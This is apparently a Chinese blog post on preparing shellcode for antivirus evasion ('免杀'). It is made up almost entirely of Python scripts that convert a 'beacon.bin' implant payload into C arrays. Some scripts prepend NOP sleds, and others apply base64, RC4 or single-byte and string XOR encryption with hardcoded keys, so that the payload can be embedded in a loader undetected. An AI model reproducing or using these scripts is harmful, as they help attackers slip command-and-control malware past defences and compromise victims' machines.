shellcode处理

C语言数组处理

def read_binary_file(filename):
    with open(filename, "rb") as file:
        return file.read()


def generate_c_array(data):
    nop = "\t0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,"
    c_array = ""
    for i, byte in enumerate(data):
        if i % 100 == 0:
            c_array += "\n"
            c_array += "\t"
        c_array += f"0x{byte:02X}, "
    c_array = c_array.rstrip(", ")  # 移除最后⼀个逗号和空格
    return "{" + nop + c_array + "\n};"


def main():
    # 读取⼆进制⽂件
    filename = "beacon.bin"
    binary_data = read_binary_file(filename)

    # ⽣成C格式的数组
    c_array = generate_c_array(binary_data)

    # 将结果输出到⽂件
    output_filename = "base_res.txt"
    with open(output_filename, "w") as file:
        file.write(c_array)


if __name__ == "__main__":
    main()

base64编码

import base64

def read_binary_file(filename):
    with open(filename, "rb") as file:
        return file.read()

def base64_encode(data):
    encoded_data = base64.b64encode(data)
    return encoded_data.decode("utf-8")

def generate_c_array(data):
    c_array = ""
    for i, char in enumerate(data):
        if i % 100 == 0:
            c_array += "\n"
            c_array += "\t"
        c_array += f"0x{ord(char):02X}, "
    c_array = c_array.rstrip(", ") # 移除最后一个逗号和空格
    return "{" + c_array + "\n};"

def main():
    # 读取二进制文件
    filename = "beacon.bin"
    binary_data = read_binary_file(filename)
    # Base64编码处理数据
    encoded_data = base64_encode(binary_data)
    # 生成C格式的数组
    c_array = generate_c_array(encoded_data)
    # 将结果输出到文件
    output_filename = "base64_res.txt"
    with open(output_filename, "w") as file:
        file.write(c_array)

if __name__ == "__main__":
    main()

RC4加密

from Crypto.Cipher import ARC4


def encrypt_rc4(key, data):
    cipher = ARC4.new(key)
    encrypted_data = cipher.encrypt(data)
    return encrypted_data


def generate_c_array(data):
    c_array = ""
    for i, byte in enumerate(data):
        if i % 100 == 0 and i != 0:
            c_array += "\n"
        c_array += "\t"
        c_array += f"{hex(byte)}, "
    return "{\t" + c_array + "\n};"


def write_to_file(filename, content):
    with open(filename, "w") as file:
        file.write(content)


# 读取⽂件
with open("beacon.bin", "rb") as file:
    beacon_data = file.read()


def main():
    # RC4加密
    key = b"YourKey"
    encrypted_data = encrypt_rc4(key, beacon_data)

    # ⽣成C格式数组
    c_array = generate_c_array(encrypted_data)

    # 写⼊⽂件
    write_to_file("base_rc4_res.txt", c_array)


if __name__ == "__main__":
    main()

base64+rc4

from Crypto.Cipher import ARC4
import base64


def read_binary_file(filename):
    with open(filename, "rb") as file:
        return file.read()


def encrypt_rc4(key, data):
    cipher = ARC4.new(key)
    encrypted_data = cipher.encrypt(data)
    return encrypted_data


def base64_encode(data):
    encoded_data = base64.b64encode(data)
    return encoded_data.decode("utf-8")


def generate_c_array(data):
    c_array = ""
    for i, char in enumerate(data):
        if i % 100 == 0:
            c_array += "\n"
            c_array += "\t"
        c_array += f"0x{ord(char):02X}, "
    c_array = c_array.rstrip(", ")  # 移除最后⼀个逗号和空格
    return "{" + c_array + "\n};"


def main():
    filename = "beacon.bin"
    binary_data = read_binary_file(filename)

    # RC4加密
    key = b"YourKey"
    encrypted_data = encrypt_rc4(key, binary_data)

    # Base64编码处理数据
    encoded_data = base64_encode(encrypted_data)
    c_array = generate_c_array(encoded_data)

    # 将结果输出到⽂件
    output_filename = "base64_rc4_res.txt"
    with open(output_filename, "w") as file:
        file.write(c_array)


if __name__ == '__main__':
    main()

xor加密

数字型异或

def read_binary_file(filename):
    with open(filename, "rb") as file:
        return file.read()


def xor_data(data, key):
    return bytes(byte ^ key for byte in data)


def generate_c_array(data):
    nop = "\t0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,"
    c_array = ""
    for i, byte in enumerate(data):
        if i % 100 == 0:
            c_array += "\n"
        c_array += "\t"
        c_array += f"0x{byte:02X}, "
    c_array = c_array.rstrip(", ")  # 移除最后⼀个逗号和空格
    return "{" + nop + c_array + "\n};"


def main():
    # 读取⼆进制⽂件
    filename = "beacon.bin"
    binary_data = read_binary_file(filename)

    # 异或处理数据
    xor_key = 77
    xor_result = xor_data(binary_data, xor_key)

    # ⽣成C格式的数组
    c_array = generate_c_array(xor_result)

    # 将结果输出到⽂件
    output_filename = "xor_int_res.txt"
    with open(output_filename, "w") as file:
        file.write(c_array)


if __name__ == "__main__":
    main()

字符型异或

def read_binary_file(filename):
    with open(filename, "rb") as file:
        return file.read()

def xor_data(data, key):
    key_length = len(key)
    return bytes(byte ^ key[i % key_length] for i, byte in enumerate(data))

def generate_c_array(data):
    c_array = ""
    for i, byte in enumerate(data):
        if i % 100 == 0:
            c_array += "\n"
        c_array += "\t"
        c_array += f"0x{byte:02X}, "
    c_array = c_array.rstrip(", ")  # 移除最后⼀个逗号和空格
    return "{" + c_array + "\n};"

def main():
    # 读取⼆进制⽂件
    filename = "beacon.bin"
    binary_data = read_binary_file(filename)

    # 异或处理数据
    xor_key = "baidu"
    xor_result = xor_data(binary_data, xor_key.encode())

    # ⽣成C格式的数组
    c_array = generate_c_array(xor_result)

    # 将结果输出到⽂件
    output_filename = "xor_str_res.txt"
    with open(output_filename, "w") as file:
        file.write(c_array)

if __name__ == "__main__":
    main()

免杀

shellcode处理

http://xiaowu5.cn/2025/12/15/shellcode处理/

作者

发布于

2025年12月15日

许可协议

BY XIAOWU

红日2 下一篇